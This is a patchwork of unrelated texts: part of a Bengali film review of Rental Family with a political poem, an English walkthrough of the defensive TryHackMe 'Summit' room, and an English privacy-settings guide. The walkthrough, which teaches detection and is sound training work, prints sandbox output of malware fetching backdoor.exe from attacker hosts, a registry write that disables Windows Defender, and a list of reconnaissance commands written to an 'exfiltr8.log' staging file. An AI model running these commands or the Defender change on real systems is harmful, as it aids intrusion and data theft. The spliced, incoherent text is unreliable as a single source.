নিজের মেয়ের নিষেধ অগ্রাহ্য করে Philip-কে সঙ্গী করে সে চুপিচুপি বেরিয়ে পড়ে। এই যাত্রা শুধু একটি ভ্রমণ নয়, বরং জীবনের শেষ প্রান্তে দাঁড়িয়ে নিজের অস্তিত্বটুকু ছুঁয়ে দেখার চেষ্টা।

আর Shinji Tada, এই চরিত্রটি যেন সবচেয়ে নগ্ন বাস্তবতার প্রতিচ্ছবি। মানসিক শান্তির জন্য সে ভাড়া করে নেয় স্ত্রী ও সন্তান। নিজের ভেতরের শূন্যতা ঢাকতে সে মিথ্যের আশ্রয় নেয়, কারণ তার কল্পনার পরিবার বাস্তবে নেই। তবু এই মিথ্যে সম্পর্কের মাঝেও তার বেঁচে থাকার লড়াইটা করুণভাবে সত্য। ⠀⠀⠀⠀ ⠀⠀⠀⠀ ⠀⠀⠀⠀ Rental Family কোনো উচ্চকণ্ঠ সিনেমা নয়। এখানে নেই নাটকীয় সংলাপ, নেই বড়ো কোনো মোড়। কিন্তু প্রতিটি দৃশ্য নিঃশব্দে প্রশ্ন ছুড়ে দেয়- আমরা কি সত্যিই একা? নাকি প্রয়োজন আর অভিনয়ের মাঝামাঝি কোথাও আমাদের অনুভূতিগুলো সত্যি হয়ে ওঠে?

সিনেমাটি শেষ হওয়ার পর মনে হয়েছে, এই গল্পটা শুধু পর্দার নয়- এটা আমাদের চারপাশেই ছড়িয়ে আছে। ভাড়ার সম্পর্ক, অভিনীত অনুভূতি, আর তার ভেতর জন্ম নেওয়া অপ্রত্যাশিত মানবিক বন্ধন- সব মিলিয়ে Rental Family এমন একটি সিনেমা, যা দেখে বেরিয়ে এসে মানুষ আর জীবনের দিকে নতুন করে তাকাতে ইচ্ছে করে।

⠀⠀

যদি আপনি নীরব, মানবিক আর ভাবনার খোরাক দেওয়া সিনেমা পছন্দ করেন, তাহলে এই সিনেমাটি আপনার দেখার তালিকায় থাকতেই পারে।

⠀⠀

⠀⠀

⠀⠀

এই ছবিটা আমাদের রাজনীতির নীরব আত্মকথা এখানে নেতা বলেন আর জনতা মুগ্ধ হয় শব্দগুলো আলো জ্বালায়, আকাঙ্ক্ষার মানচিত্র আঁকে মঞ্চে দাঁড়িয়ে পরিবর্তনের প্রতিশ্রুতিতে তালি পড়ে

কিন্তু মঞ্চ থেকে নামলেই দৃশ্য বদলে যায় স্বপ্ন পথে হাঁটতে চাইলে সিস্টেম চোখ রাঙানি দেয় প্রশ্ন করতে গেলেই হাত বাড়ে গলার দিকে কণ্ঠ রুদ্ধ হলে সত্য ও স্বপ্ন দু’টিই হাঁপিয়ে পড়ে

ক্ষমতার বড়ো মুখটা ছোট মুখটাকে অভিভূত করে, করতালির বিনিময়ে স্বপ্নের ছায়া দেখিয়ে বেড়ায় আশ্বাসের বাণী সব মাইক্রোফোনে উন্মুক্ত, আর মানুষ খুব সন্তর্পণে তার দীর্ঘশ্বাস লুকায়

আমাদের রাজনীতি শব্দ ভালোবাসে, কিন্তু কণ্ঠ সহ্য করতে পারে না এখানে বক্তৃতা নিরাপদ, বাস্তবতা বিপজ্জনক তবু ইতিহাস বলে- চেপে ধরা গলাও একদিন চিৎকার শিখে ফেলে...

ছবি কার্টেসি: Eiko Ojala

This is a Walkthrough for the Summit Incident Response TryHackMe challenge room. The writeup is meant to offer short and concise solutions, and also offering an extended explanation right after the answer for those interested in finding out more about the solution to a specific task.

Introduction

The description of the room is the following:

Can you chase a simulated adversary up the Pyramid of Pain until they finally back down?

The room is essentially a threat detection and response simulator focusing on defending against increasingly harder threats by following the levels on the Pyramid of Pain. We will be receiving .exe files by email, and will have to run those through a built-in sandbox analysis tool.

The first email we get is one containing a file named sample1.exe

Task 1: What is the first flag you receive after successfully detecting sample1.exe?

1. Read the email and click on the attachment to download.
2. Go to the burger menu on the top left, then click on the Malware Sandbox tool. Choose sample1.exe

After a while, we will get the results. We got an information table and a Behaviour Analysis section. For this task, though, we have to focus on the table:

File Name	sample1.exe
File Size	202.50 KB
File Type	PE32+ executable (GUI) x86-64, for MS Windows
Analysis Date	September 5, 2023
OS	Windows 10x64 v1803
Tags	Trojan.Metasploit.A
MIME	application/x-dosexec
MD5	cbda8ae000aa9cbe7c8b982bae006c2a
SHA1	83d2791ca93e58688598485aa62597c0ebbf7610
SHA256	9c550591a25c6228cb7d74d970d133d75c961ffed2ef7180144859cc09efca8c

Following the Pyramid of Pain, the first level is “Hash value.”

1. Go to the burger menu, then click on Manage Hashes.
2. There are three options: MD5, SHA1, SHA256. Pick either, and input the corresponding hash.

We will get a message congratulating us on completing the task, and a new email containing flag 1 and the next malware sample.

Task 2: What is the second flag you receive after successfully detecting sample2.exe?

1. Read the new email and click on the sample2.exe attachment.
2. Analyze the file on the Malware Sandbox tool.

But by changing just one bit the hash value of a file can change completely, so it is easy to evade this method. The second level of the Pyramid of Pain corresponds to IP Addresses. The analysis will give us, again, an information table, a Behaviour Analysis section, and now a Network Activity. The latter is the one we will have to check now.

The results are as follows (Information Table and Behaviour Analysis sections omitted):

Network Activity

HTTP(S) requests

1

TCP/UDP connections

3

DNS requests

0

Threats

0

HTTP requests

PID	Process	Method	IP	URL
1927	sample2.exe	GET	154.35.10.113:4444	http://154.35.10.113:4444/uvLk8YI32

Connections

PID	Process	IP	Domain	ASN
1927	sample2.exe	154.35.10.113:4444	-	Intrabuzz Hosting Limited
1927	sample2.exe	40.97.128.3:443	-	Microsoft Corporation
1927	sample2.exe	40.97.128.4:443	-	Microsoft Corporation

If we take a look at the HTTP Request we can see the executable connects to and downloads a file from the 154.35.10.113 IP address. We now have to create a Firewall rule for this IP address.

1. Go to the Burger Menu, then click on the Firewall Manager tool. We need to fill some fields, which we will as follows:
2. Type: Egress
3. Source IP: Any
4. Destination IP: 154.35.10.113
5. Action: Deny

We will receive a congratulating message and a new email with flag 2.

Extra: Why not the other two IPs

According to the analysis, the file would make a connection to another two addresses: 40.97.128.3 and 40.97.128.4. These IP addresses, however, were identified to belong to Microsoft whereas the one we chose apparently belongs to a hosting service. Connecting to a Microsoft IP address is completely normal for business operations... not so much connecting to and downloading files from an IP address that belongs to a hosting service.

Task 3: What is the third flag you receive after successfully detecting sample3.exe?

Changing one's IP address is not particularly hard – the attacker mentions on their email message that they hired a new Cloud Service Provider and now have access to many more IPs. The third level of the Pyramid of Pain corresponds to Domain Names.

1. Read the new email and analyze the sample3.exe file.

Under Network Activity we will have a new section, DNS requests.

(output omitted)

Network Activity

HTTP(S) requests

2

TCP/UDP connections

4

DNS requests

2

Threats

0

HTTP requests

PID	Process	Method	IP	URL
1021	sample3.exe	GET	62.123.140.9:1337	http://emudyn.bresonicz.info:1337/kzn293la
1021	sample3.exe	GET	62.123.140.9:80	http://emudyn.bresonicz.info/backdoor.exe

Connections

PID	Process	IP	Domain	ASN
1021	sample3.exe	40.97.128.4:443	services.microsoft.com	Microsoft Corporation
1021	sample3.exe	62.123.140.9:1337	emudyn.bresonicz.info	XplorIta Cloud Services
1021	sample3.exe	62.123.140.9:80	emudyn.bresonicz.info	XplorIta Cloud Services
2712	backdoor.exe	62.123.140.9:80	emudyn.bresonicz.info	XplorIta Cloud Services

DNS requests

Domain	IP
services.microsoft.com	40.97.128.4
emudyn.bresonicz.info	62.123.140.9

The DNS requests section showed us the domain the executable is downloading files from, emudyn.bresonicz.info. The other one belongs to Microsoft, so we can assume it's safe.

1. Head to the Burger menu, and then click on DNS Rule Manager.
2. Click on Create DNS Rule
3. We have to fill some fields. Do so as follows:
   • Rule name: (Any works. I named it “Deny Phishing Domain.”)
   • Category: Phishing
   • Domain Name: emudyn.bresonicz.info
   • Action: Deny

We will receive a congratulating message and a new email with flag 3.

Task 4: What is the fourth flag you receive after successfully detecting sample4.exe?

Changing one's domain is harder than changing an IP address, as this requires purchasing a new domain and modifying DNS records. Still, a very determined hacker might still be willing to do so (and also, some DNS providers have loose standards). The next level of the Pyramid of Pain corresponds to Host and Network Artifacts.

1. Read the email and analyze sample4.exe.

The new email will contain a Registry Activity section after all the previous one. Let's take a look at that one.

(output omitted)

Registry Activity

Total events

3

Read events

1

Write events

2

Delete events

0

Modification events

(PID) Process: (3806) sample4.exe	Key: HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
Operation: write	Name: DisableRealtimeMonitoring
Value: 1
(PID) Process: (1928) explorer.exe	Key: HKEYCURRENTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Operation: write	Name: EnableBalloonTips
Value: 1
(PID) Process: (9876) notepad.exe	Key: HKEYCURRENTUSER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts.txt
Operation: read	Name: Progid
Value: txtfile

If we look at the first event, sample4.exe appears to be disabling Windows Defender Real-Time Protection by modifying the Windows Registry. This is the artifact, finding this is how we know we have a potentially infected host. We now have to create a rule that alerts us when this happens.

1. Go to the Burger Menu, then click on Sigma Rule Builder.
2. Click on Create Sigma Rule. A Sigma rule will be generated by an LLM based on the options we pick.
3. On the “I want to create a rule that focuses on:” section, pick Sysmon Event Logs.
4. On “I want to target this Sysmon event:”, pick Registry Modifications.
5. You have to fill some fields to generate the rule. Fill them as follows:
   • Registry Key: HKEYLOCALMACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection
   • Registry Name: DisableRealtimeMonitoring
   • Value: 1
   • ATT&CK ID: Defense Evasion (TA0005)
6. Click on the Validate Rule button.

Once it generates the Sigma rule, we will receive a congratulating message and a new email with flag 4.

Extra: why “alert” and not “respond”.

The reason we are creating a rule to alert rather than to respond like we did in the previous steps is because disabling Real Time Protection is, while unusual (and warned against on modern Windows), a potentially benign action. We alert the cybersecurity team when it occurs so they can investigate the situation and determine if it is expected or not, instead of just not allowing and potentially hindering a normal business operation.

Task 5: What is the fifth flag you receive after successfully detecting sample5.exe?

Knowing the artifacts an attacker leaves on a system means the attacker will have to change their tools and methodologies, which means they will have to spend even more resources to attack our system. We are now on the highest levels of the pyramid, the ones with the highest difficulty for the attacker to bypass, and at this point it's very likely they changed their target. Still, if the attacker persists, the second-to-last level of the Pyramid of Pain corresponds to detecting Tools.

1. Read the new email and click on sample5.exe According to the email, the “heavy lifting” and instructions now occur on their backend server, which means we will have significantly less information on the file's actions.

This time we don't have the results of an analysis, but a log of attempted connections:

“ 2023-08-15 09:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 09:23:45 | Source: 10.10.15.12 | Destination: 43.10.65.115 | Port: 443 | Size: 21541 bytes 2023-08-15 09:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 10:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 10:14:21 | Source: 10.10.15.12 | Destination: 87.32.56.124 | Port: 80 | Size: 1204 bytes 2023-08-15 10:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 11:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 11:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 11:45:09 | Source: 10.10.15.12 | Destination: 145.78.90.33 | Port: 443 | Size: 805 bytes 2023-08-15 12:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 12:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 13:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 13:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 13:32:17 | Source: 10.10.15.12 | Destination: 72.15.61.98 | Port: 443 | Size: 26084 bytes 2023-08-15 14:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 14:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 14:55:33 | Source: 10.10.15.12 | Destination: 208.45.72.16 | Port: 443 | Size: 45091 bytes 2023-08-15 15:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 15:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 15:40:10 | Source: 10.10.15.12 | Destination: 101.55.20.79 | Port: 443 | Size: 95021 bytes 2023-08-15 16:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 16:18:55 | Source: 10.10.15.12 | Destination: 194.92.18.10 | Port: 80 | Size: 8004 bytes 2023-08-15 16:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 17:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 17:09:30 | Source: 10.10.15.12 | Destination: 77.23.66.214 | Port: 443 | Size: 9584 bytes 2023-08-15 17:27:42 | Source: 10.10.15.12 | Destination: 156.29.88.77 | Port: 443 | Size: 10293 bytes 2023-08-15 17:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 18:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 18:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 19:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 19:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 20:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 20:30:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes 2023-08-15 21:00:00 | Source: 10.10.15.12 | Destination: 51.102.10.19 | Port: 443 | Size: 97 bytes

I confess the first thing I noticed was that the length for a lot of the attempts: most of them were over 10 KB in length. Then I realized what the actual problem with this log was: most of them go to the same destination, with the exact same byte length.

The attacker is probably using a tool that fragments messages in 97 bytes. Let us create a Sigma rule to detect when this happens.

1. Go to Create Sigma Rule, then click on Sysmon Event Logs.
2. On “I want to target this Sysmon event:”, pick Network Connections.
3. Fill the requested fields as follows:
   • Remote IP: Any
   • Remote Port: Any
   • Size (bytes): 97
   • Frequency (seconds): 1800
   • ATT&CK ID: Command and Control (TA0011)

Once it generates the Sigma rule, we will receive a congratulating message and a new email with flag 5.

Extra: why this rule

Like in the previous task, we need to alert rather than to block, as legitimate network traffic may match this criteria. We chose the Remote IP and Remote Port to be “Any” because we now the attacker can change their IP address, but this also causes that this rule could be triggered at any point. However, SOC analysts would notice how many messages with the same length would go to the same IP address, and the fact that it happens every 30 minutes without fail, and respond to it. This is a common Defense Evasion technique, as fragmented messages are stealthier than sending all the data meant to be exfiltrated at once, and would also stop Data Loss Prevention systems from being executed.

Task 6: What is the final flag you receive from Sphinx?

A top attacker might have enough money and time to invest in changing and/or building and learning new tools and methodologies. We are at the last level of the Pyramid of Pain, and this corresponds to the Tactics, Techniques, and Procedures of the attacker. If we can detect and respond to how an attacker operates, they have almost no chance to fight back.

1. Read the final email and open the attachment.

This time the attachment is a log of the commands the sample files run once opened:

dir c:\ >> %temp%\exfiltr8.log
dir “c:\Documents and Settings” >> %temp%\exfiltr8.log
dir “c:\Program Files\” >> %temp%\exfiltr8.log
dir d:\ >> %temp%\exfiltr8.log
net localgroup administrator >> %temp%\exfiltr8.log
ver >> %temp%\exfiltr8.log
systeminfo >> %temp%\exfiltr8.log
ipconfig /all >> %temp%\exfiltr8.log
netstat -ano >> %temp%\exfiltr8.log
net start >> %temp%\exfiltr8.log

This is showing us the sample files were using commands that display important system information (directory trees, user list, system info, network information) and redirect the output to a file named exfiltr8.log, located in the temp folder (common place to hide malware, as nearly everything has writing permissions here.) Let us generate a rule to detect the creation of this file.

1. Go to Create Sigma Rule, and then click on System Event Logs.
2. On “I want to target this Sysmon event:”, pick File Creation and Modification.
3. Fill the requested fields as follows:
   • File Path: %temp%
   • File Name: exfiltr8.log
   • ATT&CK ID: Collection (TA0009)

Once it generates the Sigma rule, we will receive a congratulating message and a new email with the final flag.

Congratulations! The room is finished.

What I Learnt

• Pyramid of Pain: this challenge allowed me to strengthen my knowledge on the framework, forcing me to think why each level has its corresponding difficulty, by thinking how an attacker could bypass a detection or deny rule.
• Sigma rule structure: levels 3 to 5 involved generating a Sigma rule, which the SOC L1 learning path (this challenge was part of it) has no room on at this point.
• Analyzing logs: task 5 was about to look for a specific pattern in a log file. Even if at first I focused on the wrong pattern, I managed to realize quite quickly what was I supposed to be looking for.
• Learning how an attacker might hide their actions, and thinking of False Positives: some tasks involved the attacker hiding their signatures, or hiding their actions by modifying system files. For these I had to consider about False Positives as well, as some of their actions could be similar to normally benign actions, and creating an overly lax detection rule might make the SOC team focus on the wrong alert.

This guide will cover various recommendations for Windows/Linux/iOS with an eye for free, open-source, private software and privacy-enhancing tips. Given the amount I'll be covering, it will not be in maximum depth (i.e., I do not always offer all possible options or my full reasoning for recommendations). Please refer to my PC Privacy Guide, iOS Privacy Guide, and De-Googling Guide back on my old Substack for more focused guides.

And yes, non-corporate Linux and Graphene is vastly preferable to Windows and iOS. Your privacy on Windows and iOS is inherently compromised. You can, however, reduce data collection in some marginal ways, and you certainly can improve the external privacy of your system (i.e., reduce the amount that web trackers are monitoring you and such). Frankly, I do not yet have sufficient experience with either to really cover them in detail, nor do I think that installing a new OS is a privacy tip that most people will just up and follow. This article is aimed towards people who may not be willing to go that far yet. I do have some brief comments on OS options on.

I'll hopefully be putting out a follow-up post to this fairly soon, so stay posted for that. It'll be more FOSS and recommendations of cool tools rather than what I consider to be essential privacy steps.

Additional Resources

• Privacy Tests – A website which compares open-source tests of browser privacy. It is one of the easiest ways to quickly compare the major browsers.

• Avoid the Hack’s Browser Comparison Tool – Similar to Privacy Tests, but more generalized and with information on more browsers.

• Privacy Guides and Avoid the Hack – Websites managed by people familiar with the privacy world, and so tend to have much better recommendations than similar sites. You can find recommended browsers, operating systems, email providers, etc.

• EFF’s Cover Your Tracks – A tool that attempts to fingerprint your browser in order to determine how protected you are. Extremely helpful for testing whether features are truly improving your privacy.

• O&O Software – Makers of a number of tools that can make Windows more secure/private. Many of the tools are paid, but AppBuster and ShutUp10++ are both free, and I highly recommend ShutUp10++ in particular for disabling Windows bloat/spyware.

De-Googling

While you may still need a Google account for certain things, you certainly can adjust settings to improve privacy and migrate most services away from Google.

For tweaks, most of the settings you'll want will be under Data & Privacy in Google Account. You'll ideally want to disable everything under Things you’ve done and places you’ve been. You'll also want to limit the amount of info shared under Info you can share with others and cut down on the number of third-party services under Data from apps and services you use.

Beyond the general tweaks, I'd highly recommend disabling all “personalization” and “smart” features, as nowadays that is often cover for AI-powered data harvesting. You can find a number of these features under general Gmail settings.

As for migration, Google's Dashboard, Takeout, and Delete Services will be your friends. Dashboard shows a general overview of your data and services, Takeout allows you to export your data, and Delete Services, of course, allows you to delete things.

Recommendations

• Google Search –> Startpage, DuckDuckGo, or SearXNG. Startpage is a simple Google and Bing wrapper, so should work well for most users. DDG has been implementing AI features I'm really not a fan of, but it does have some very handy features, an onion service, and a version of the engine without AI, so DDG NoAI is my personal choice. SearXNG is the most versatile of the 3, even including search functions for torrents and other specifics, but service can be a bit spotty in my experience.

• Gmail –> Tuta Mail or Mailbox Mail, and/or Thunderbird. Tuta and Mailbox Mail are both encrypted email providers that will be a significant step up from Gmail. That being said, bear in mind that the main gain is privacy in respect towards the provider – end-to-end encryption, by definition, is only ever enabled for these services if the person you are emailing uses a compatible encryption service. I've personally heard better things about Tuta's user experience, and it's what I personally use. If you continue to use Gmail, I'd recommend using Thunderbird as an email client, as it will provide some modest improvements over accessing your Gmail on the web (and does enable E2EE if you're looking to do so).

• Google Maps –> Open Street Map/Organic Maps or Apple Maps. Open Street Map is community-developed, which is great, but means that it isn't always as up-to-date. Organic Maps is the one iOS app for OSM that I know of (though there may be others), and it doesn't have the best routing features, nor is it always up-to-date with OSM, even. For most people with iPhones, I'd recommend just using Apple Maps, as it is marginally more private than Google Maps, and much more comparable in features/map data.

• Google Drive –> CryptPad or LibreOffice. Privacy Guides only recommends CryptPad, so it's my primary choice as well. Filen is a good second choice, especially if you need more than 1 free GB (Filen offers 10). LibreOffice is a decent primarily offline replacement, though as consequence it's more a Microsoft Office replacement than a Google one.

• Google Photos – Ente. If you're wanting a specifically online photo/video manager, Ente is your best bet. Naturally, you could also simply store things offline or use one of the Drive replacements.

• YouTube –> FreeTube. You have a lot of options for YouTube replacements, including alternative front-ends like Invidious and Fediverse equivalents like PeerTube. If you want to keep your subscriptions, however, a client is the way to go (Invidious had some support for accounts/subs, but I believe that's largely died). FreeTube is not the only client option, but it is easily my favorite. You can import your subcriptions quite easily, but for playlists you may have to import from URLs. Since Watch Later cannot be made public, to import it from URL you will have to copy it to another playlist, then import that playlist. The extension Multiselect for YouTube makes this fairly quick. FreeTube will occasionally break for a short time after YouTube changes things, but generally it works quite well, and has some fantastic features.

• Google News –> NetWireNews (iOS) or Feeder (Android). I'd highly recommend using RSS for your news aggregation. It gives you much better control, and you can avoid ads and all other nonsense. You can typically add news sources simply by pasting in their URL, though occasionally you may need to add /rss or /feed to the end.

• Google Keep –> Obsidian. It has so many great features; I truly can't recommend it enough.

• Google Meet –> Jitsi Meet. Naturally, you may not always have a choice, but Jitsi is the preferred option for secure video calls.

Hardware

Avoid smart home devices at any cost, end of story. For a phone, ideally, I'd recommend a Pixel with GrapheneOS, the gold-standard for secure mobile OSs (Graphene has plans to be available on other phones, but this is still in the works). Privacy Guides also has some app recommendations and advice on how best to obtain apps (of particular note – avoid the Google Play store, and F-Droid isn’t the best either).

iOS Recommendations

Privacy and Security Settings

Shut off everything under Analytics and Improvements and Apple Advertising. Under Tracking, disable Allow Apps to Request to Track and disable permissions for all the apps that requested it.

Under Location Services, review which apps have access and disable or limit any unnecessary ones. This should include location logging for the Camera app! Next, at the bottom of Location Services you’ll want to go into System Services. You can disable the vast majority of these services. Emergency Calls and SOS, Find My iPhone, and Share My Location should probably be left enabled for most people. Disabling Networking and Wireless can potentially impact performance, since you may not always be connected to the closest tower. Personally, I haven’t noticed a difference. Everything under Product Improvement (iPhone Analytics, etc) should be disabled as well.

Still under System Services, I would also highly recommend disabling Significant Locations. This feature logs locations you visit in order to determine the titular “significant” locations, allowing it to effectively have map pins for your home, work, favorite grocery store, friends’ apartments, etc. This will clear certain Apple Maps saved locations, but I would recommend it regardless.

Lastly, I'd recommend going through Safety Check to see and confirm/retract information you are still sharing. Enabling the App Privacy Report can also be useful, as it logs what domains apps are contacting. (Note that it'll be on you to go back later and see what apps are regularly contacting Facebook; it's just a passive report).

iCloud

Obviously, anything in your iCloud can potentially be accessed by Apple. Thankfully, Apple does offer end-to-end encryption for iCloud, though it is disabled by default. Be aware that enabling it means that if you ever fully get locked out of your phone / iCloud, Apple will not be able to retrieve your stuff.

Under iCloud, disable anything you don’t need backed up (and consider that that could mean everything). You may also want to consider disabling Access iCloud Data on the Web at the bottom. Most crucially, enable Advanced Data Protection.

Network

Go to Wi-Fi, then select the i by your Wi-Fi network. Scroll down to Private Wi-Fi Address. Set this to Rotating if it isn’t already, and below it enable Limit IP Address Tracking. While your iPhone generally will, by default, generate a different address for each network, it may not be set to randomize on the same network. Rotating is generally better, but for networks that force you through a portal (like hotels), it may make you sign back in each time. (This is why, you’ll note, these settings are individual to each network).

I'd recommend setting up a private DNS, with Mullvad's “base” DNS being my top recommendation. This will help keep your browsing a little more private, with the added benefit of blocking ads, trackers, and malware. You can follow Mullvad's instructions on setting it up. It is fairly straightforward, but do be sure to do the seemingly pointless step of selecting the profile in Files (step 7), otherwise the Profile Download button will not appear in step 9.

A VPN isn't a bad idea either, though in my experience mobile VPNs can be a bit buggy at times. Proton VPN is the only good free option I know of (even though I don't wholly trust Proton), while Mullvad VPN would be my recommendation for anyone who can pay for a VPN. IVPN is pretty good as well, and fairly comparable to Mullvad. I would strongly recommend against any VPN that isn't those 3.

Browser

While there are an array of options for iOS browsers, the choices are in actuality limited by the restrictions that Apple places on browsers that are not Safari. Brave, DuckDuckGo, and Firefox Focus do all have some improvements over base Safari. So barring any tweaking, I'd recommend DDG as a daily driver and Firefox Focus if you want permanent incognito (I do not recommend Brave, both for the crypto BS and because the CEO is homophobic).

Overall, however, if you truly want a private browser, Safari is the best choice. I would recommend following Privacy Guide's tips for settings to harden it, excluding their recommendation to enable FaceID for private browsing (I don't recommend biometrics in general, since they potentially allow access without your consent).

I would also highly recommend installing uBlock Origin Lite as a Safari extension, which will help further reduce ads/trackers/etc. uBlock Origin is the gold-standard content blocker; I wouldn't recommend a different one.

Other Apps/Reccs

Use Signal whenever possible. Other messaging apps like WhatsApp or Telegram are marginally more secure than iMessage, but are significantly less secure than Signal.

Do not include locations on images, and ideally, go a step further and scrub the metadata entirely. You can create a button via Shortcuts to do this pretty easily. Note that you’ll need separate shortcuts for photos, videos, and GIFs. Making a GIF shortcut is very similar to the photos shortcut, but instead of using Convert, you use Make GIF. You could also just install an app to scrub metadata, but I'd recommend against it, as you don't know what is truly being done with your photos.

As mentioned, you can use Organic Maps for a totally private maps, though it isn't amazing. Again, Apple Maps is at least marginally better than Google Maps.

PC Privacy

Naturally, many of my De-Googling recommendations will be relevant here, so refer back to that if needed (for Office/Drive replacements, search engines, email, etc).

Operating Systems

I'm still a relative noob to Linux, but I have some potential distro recommendations. Linux Mint is the common recc for users new to Linux, as it is made to resemble Windows and is pretty well maintained. Privacy Guides recommends Fedora, openSUSE Tumbleweed, Arch Linux, and NixOS for privacy-conscious distributions. Of those, Fedora is the most beginner-friendly (which may not be saying too much if you have 0 command-line or Linux experience).

You'll also often have a choice of desktop environment, such as GNOME, KDE, Cinnamon, LXQt, and Xfce. Across both distros and desktop environments, you may see that some are considered “lightweight”, meaning that they are less resource intensive, and so may be good for older hardware.

I have only really used Lubuntu, a lightweight fork of Ubuntu using the LXQt desktop environment (I wouldn't recommend Ubuntu itself, as it's become pretty corporate). I put it on several old laptops and it's been pretty nice, though I think I'd probably use Fedora KDE if I wanted a true daily driver (greater privacy and support as far as I know, probably lower likelihood to run into some of the issues I've hit).

You can get most OSs “live”, meaning you can put them on a USB and boot from them without overwriting your true OS. Very handy for testing, and actually pretty easy! There are also some OSs that are purely live, such as Tails, which is an OS designed specifically for maximum privacy, routing connections through Tor and wiping data when done. You can also use Virtual Machines to run different OSs, including Whonix, which is similar to Tails, but with greater security features (and cannot, to my knowledge, run outside of a VM).

Windows Settings

Again, I’d highly recommend anyone who feels comfortable to jump to Linux to do so (and consider testing out a live OS, switching over may be easier than you think!). Otherwise, software like Revision can “clean” existing Windows 10/11. Please tread carefully if you’re interested; I can't attest much to functionality or trustworthiness. There are other options available for cleaner installs, but if you're willing to reinstall your OS, I would again highly encourage switching to Linux (compatibility has improved dramatically in recent years!).

Barring messing with your operating system directly, though, there are certainly still important steps you can take. To start, use ShutUp10++ to disable invasive Windows features – it will provide a GUI with recommendations and explanations for what should be disabled. Some following settings changes will be redundant with ShutUp10++.

Privacy and Security – In settings, go under Privacy & Security. Under General, turn off the Advertising ID in particular, along with the other settings in that section (except notifications). Disable everything under Diagnostics & Feedback and Text & Image Generation. Under Location, turn off Let Apps Access Your Location (they can still see approximate location; this just gets rid of precise location).

General Settings – Under Personalization > Device Use, disable everything. Also disable and remove anything under System > AI Components.

Wi-Fi – Go under Network & Internet > Wi-Fi. Below Hardware properties, enable Random hardware address. This can potentially force additional sign-ins on networks with portals, such as hotels, but is a good privacy step.

Services – Disable SSDP Discovery and UPnP Device Host. Both enable discovery and communication with different types of devices on your network, so this could potentially disconnect a device. This does not apply to standard Bluetooth devices, so for most people this is a security risk more than anything.

Browser

Your only options for a browser are Chromium-based and Gecko-based (i.e., Chrome/Firefox-based). Chromium has several limitations that immediately shoot any option there in the foot, so in all practicality you should only be looking at Firefox and Firefox forks.

Firefox itself isn't the worst, but has been making a move towards AI lately, and takes some effort to make more private. Refer to Privacy Guide's page on Firefox for more info if interested.

There are a number of forks that are probably ok options for daily drivers, such as Waterfox and Zen Browser. They benefit in not having the AI enshittification, but being downstream, are slower to update than Firefox (and therefore potentially vulnerable). So, if you're going with a fork, I'd recommend just going for one of the more privacy-focused options.

When it comes to truly private browsers, the forerunners are Librewolf, Mullvad, and Tor. Tor is the choice for the truly privacy conscious, as connections are routed over several relays, making it extremely difficult to match your browsing activity to you. Unfortunately, a number of websites block Tor users, and it can be a bit slower at times, so while I do recommend it for general browsing/searching, it probably won't be the best fit for daily use for most people.

Mullvad is essentially just the Tor browser minus the relays, making it much more usable on the daily and more private out of the box than Librewolf. I should note, however, that Librewolf updates faster than Tor/Mullvad, meaning that it has an easier time blending in with general Firefox traffic. Therefore, I'd either recommend Mullvad, or Librewolf with uBlock Origin, Port Authority, and Canvas Blocker, plus some settings tweaks. If you really want privacy but aren't very tech savvy, just go with Mullvad, but hardened Librewolf might be my preference. (And if you aren't a privacy nut, base Librewolf really isn't bad).

VPN/DNS

As mentioned for iOS, I would recommend using Mullvad's “base” DNS for slightly improved privacy + some ad and tracker blocking. You can refer to their website for how to set it up via Wi-Fi hardware settings or via browser settings. Both are fairly straightforward, though browser is certainly a bit quicker to setup. Nonetheless, I would recommend setting it up on your Wi-Fi, so your whole system gets the benefits.

